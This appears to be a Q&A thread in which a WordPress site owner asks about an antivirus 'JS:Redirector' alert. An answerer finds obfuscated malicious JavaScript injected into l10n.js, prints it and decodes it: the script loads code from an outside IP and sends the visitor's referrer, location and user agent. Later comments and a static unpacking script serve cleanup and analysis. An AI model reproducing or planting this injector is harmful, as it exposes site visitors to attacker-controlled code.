
I have this "JS:Redirector-NL [Trj]" virus issue on my website http://nutriconsulting.com.br/ . When someone opens the site, Avast antivirus displays a popup which shows this error:

Infection Details URL: http://nutriconsulting.com.br/wp-content... Process: C:\Users\Cyber Solutions\AppData\Local\G... Infection: JS:Redirector-NL [Trj]

I scanned my cPanel files twice but all files are clean there, so how do I remove it? This Trojan is running in JavaScript files. I will really appreciate it if someone gives me an idea of how to look for malicious code in JavaScript.

Again, this domain only triggers an error in Avast antivirus; it is not flagged by other antiviruses like Symantec or Norton, so please check it with Avast. Please help me fix this issue; I am looking for a quick response.

Thanks

leito cancer
  • Got `JS.Alescurf` using Symantec Endpoint Protection – Milan Halada Apr 10 '12 at 06:26
  • Yes, it displays a different error in Symantec, but how can I fix it? Any help? – leito cancer Apr 10 '12 at 06:27
  • Well, your site is sending info to 91.196.216.64... check your JS; there has to be something there that is not supposed to be there. – Milan Halada Apr 10 '12 at 06:30
  • OK, you mean this IP "91.196.216.64" is in the JavaScript files? So I need to simply remove it? I will really appreciate it if you could check the JavaScript files for me. Can I share the JavaScript code here or send you the link to download the infected files? – leito cancer Apr 10 '12 at 06:33
  • The JavaScript files didn't have a virus in them, but I think they run a script which redirects my site to the IP you've mentioned. – leito cancer Apr 10 '12 at 06:34
  • It can be obfuscated; I would just delete the JS on the site and upload it again from backup. I'm not an expert in this, and I do not believe I would be able to find it inside your JS. – Milan Halada Apr 10 '12 at 06:37
  • The problem is I don't have a backup, but I want to clean it as soon as possible. Any other suggestion? Because if I delete the JS files then it may stop other functions of the site. Thank you. – leito cancer Apr 10 '12 at 06:49
  • Try to delete the code that stewe mentioned. – Milan Halada Apr 10 '12 at 06:59

1 Answer


Have a look at: http://nutriconsulting.com.br/wp-includes/js/l10n.js?ver=20101110

There it is:

var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} 
;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

and in decoded form:

element = document.getElementById('dgllhguk');
if (!element) {
    hghjghjhjgjh = document.location;
    hghjhjhjg = escape(document.referrer);
    ugkkjkj = escape(navigator.userAgent);
    var js = document.createElement('script');
    js.id = 'dgllhguk';
    js.src = 'http://91.196.216.64/s.php?ref=' + hghjhjhjg + '&lc=' + hghjghjhjgjh + '&ua=' + ugkkjkj;
    var head = document.getElementsByTagName('head')[0];
    head.appendChild(js)
}

The one who is controlling 91.196.216.64 (Russian Federation / ISP: SpetsEnergo Ltd.) can execute arbitrary JS code on your site.

stewe
  • Thanks for the help stewe, but it's in other JavaScript files too, so can I look for the same code in the others? – leito cancer Apr 10 '12 at 06:46
  • I would recommend changing all passwords, and you should restore the original files. Also make sure to always use the latest version of WordPress. – stewe Apr 10 '12 at 06:57
  • Yes, I understand it, but the problem is I don't have a backup of the website right now. I just need your help to clean up these JavaScript files; I don't know any other way. Please help me fix this issue; the code you decoded is really helpful. So what am I supposed to do? Can I simply find and remove this code from the other infected JavaScript files? – leito cancer Apr 10 '12 at 07:04
  • Be aware that removing the code may help for now, but it is very important to find the reason why the infection happened in the first place. Maybe it is an outdated version of WordPress or some other code that has a security hole which needs to be fixed. – stewe Apr 10 '12 at 07:33
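The packer in the infected l10n.js is a plain word-substitution scheme, so it can be reversed statically instead of with eval. The following Node script is an added example (not code from the answer or from WordPress) that rebuilds the packer's lookup table and extracts the remote host the unpacked code loads; the two sample strings are `_0x4470[0]` and `_0x4470[3]` from the answer with their `\xNN` escapes rendered, and the base, word count and `|` separator come from the call at the end of the blob.

```javascript
// Static unpacker for the eval(function(p,a,c,k,e,d){...}) word-substitution packer
// seen in the infected file. The packer replaces every \w+ token in the payload with
// words[parseInt(token, base)], so a regex replace with the same table reverses it.

// _0x4470[0] from the answer (escapes rendered): the packed payload.
const PACKED = "9=1.d('5');b(!9){8=1.j;4=6(1.i);7=6(g.k);a 2=1.e('c');2.f='5';"
  + "2.h='w://t.u.l.v/s.r?q='+4+'&m='+8+'&n='+7;a 3=1.o('3')[0];3.p(2)}";

// _0x4470[3] from the answer (escapes rendered): the word list, '|'-separated.
const DICT = "|document|js|head|hghjhjhjg|dgllhguk|escape|ugkkjkj|hghjghjhjgjh|"
  + "element|var|if|script|getElementById|createElement|id|navigator|src|"
  + "referrer|location|userAgent|216|lc|ua|getElementsByTagName|appendChild|"
  + "ref|php||91|196|64|http";

function unpack(payload, base, count, words) {
  // Rebuild the packer's table: token c.toString(base) -> words[c]; an empty
  // slot falls back to the token itself, exactly as the packer's loop does.
  const table = new Map();
  for (let c = count - 1; c >= 0; c--) {
    const key = c.toString(base);
    table.set(key, words[c] || key);
  }
  return payload.replace(/\b\w+\b/g, (tok) => (table.has(tok) ? table.get(tok) : tok));
}

// Collect the URLs the unpacked script would request, so the remote host is visible.
function extractUrls(src) {
  return Array.from(src.matchAll(/https?:\/\/[^'"\s]+/g), (m) => m[0]);
}

// Unpack with the parameters used in the infected file (base 33, 33 words, '|').
function analyse(packed, dict) {
  const code = unpack(packed, 33, 33, dict.split('|'));
  return {
    code,
    urls: extractUrls(code),
    // A script element created at load time is the injection pattern to flag.
    injectsScript: /createElement\('script'\)/.test(code),
  };
}

const result = analyse(PACKED, DICT);
console.log(result.code);
console.log('remote loads:', result.urls);
```

Running it prints the same script stewe decoded, with `http://91.196.216.64/s.php?ref=` listed as the remote load; pointing the same table at the other infected files shows whether they carry the same payload.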